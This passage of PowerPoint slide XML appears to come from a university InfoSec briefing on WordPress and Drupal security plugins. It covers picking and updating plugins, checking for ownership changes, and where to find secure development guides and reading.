              <a:buSzPts val="2000"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="⎼"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>redundant features, especially between all-in-ones could cause conflicts</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-381000" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="&gt;"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Keep in mind best fit for your security goals </a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-355600" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="⎼"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>e.g. a captcha plugin may be important only for sites with public web forms</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="16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100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Security plugin/modules: 2 of 2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="223" name="Google Shape;223;p38"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1159438"/>
            <a:ext cx="8520600" cy="3416400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-381000" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="&gt;"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Keep security products updated and review them periodically just like any other plugin/module, e.g.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-355600" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="⎼"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>did an update to your CMS core or your all-in-one plugin eliminate the need for a specific-use security plugin?</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-355600" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="⎼"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>did the plugin change ownership - what impact will that have</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="16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457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="10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Monthly InfoSec briefings </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64" name="Google Shape;64;p12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="387900" y="1220350"/>
            <a:ext cx="8520600" cy="837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500"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Intended to share information, provide education, and stimulate conversation on a variety of security topics.</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="4B2E83"/>
              </a:solidFill>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="Google Shape;65;p12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="461375" y="2136725"/>
            <a:ext cx="8520600" cy="21984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4B2E83"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>2nd Thursdays of each month, 1:00-2:00</a:t>
            </a:r>
            <a:endParaRPr sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4B2E83"/>
              </a:solidFill>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4B2E83"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Part of creating a “culture of security”</a:t>
            </a:r>
            <a:endParaRPr sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4B2E83"/>
              </a:solidFill>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4B2E83"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>If you have a topic you’d like to present, contact malbin@uw</a:t>
            </a:r>
            <a:endParaRPr sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4B2E83"/>
              </a:solidFill>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="E9F387"/>
                </a:highlight>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Email</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="E9F387"/>
                </a:highlight>
                <a:latin typeface="Open Sans ExtraBold"/>
                <a:ea typeface="Open Sans ExtraBold"/>
                <a:cs typeface="Open Sans ExtraBold"/>
                <a:sym typeface="Open Sans ExtraBold"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="E9F387"/>
                </a:highlight>
                <a:latin typeface="Open Sans ExtraBold"/>
                <a:ea typeface="Open Sans ExtraBold"/>
                <a:cs typeface="Open Sans ExtraBold"/>
                <a:sym typeface="Open Sans ExtraBold"/>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" xmlns="" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>ciso@uw.edu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="E9F387"/>
                </a:highlight>
                <a:latin typeface="Open Sans ExtraBold"/>
                <a:ea typeface="Open Sans ExtraBold"/>
                <a:cs typeface="Open Sans ExtraBold"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="E9F387"/>
                </a:highlight>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>with "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="E9F387"/>
                </a:highlight>
                <a:latin typeface="Open Sans ExtraBold"/>
                <a:ea typeface="Open Sans ExtraBold"/>
                <a:cs typeface="Open Sans ExtraBold"/>
                <a:sym typeface="Open Sans ExtraBold"/>
              </a:rPr>
              <a:t>Briefings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="E9F387"/>
                </a:highlight>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>" in the subject line for notifications</a:t>
            </a:r>
            <a:endParaRPr sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4B2E83"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="E9F387"/>
              </a:highlight>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4B2E83"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="E9F387"/>
              </a:highlight>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>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
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="200"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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5">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="200"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6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5">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="200"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6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5">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="200"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6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Developing secure themes/plugins</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="229" name="Google Shape;229;p39"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1261488"/>
            <a:ext cx="8520600" cy="3416400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-381000" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="&gt;"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Wordpress</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-355600" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="⎼"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>secure theme development</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-355600" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="⎼"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>secure plugin development</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-381000" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="&gt;"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Drupal</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-355600" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="⎼"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
                <a:hlinkClick r:id="rId5">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" xmlns="" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>secure coding</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="100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More  info</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="235" name="Google Shape;235;p40"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1261488"/>
            <a:ext cx="8520600" cy="3416400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>UW Libraries O’Reilly Academic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t> recently published ebooks/videos:</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-381000" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>WordPress Security Masterclass video course</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-355600" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="⎼"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>chapter 4 includes helpful overview of current security plugins</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-381000" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Professional WordPress Plugin Development</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-355600" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="⎼"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>chapter 4 Security and Performance</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
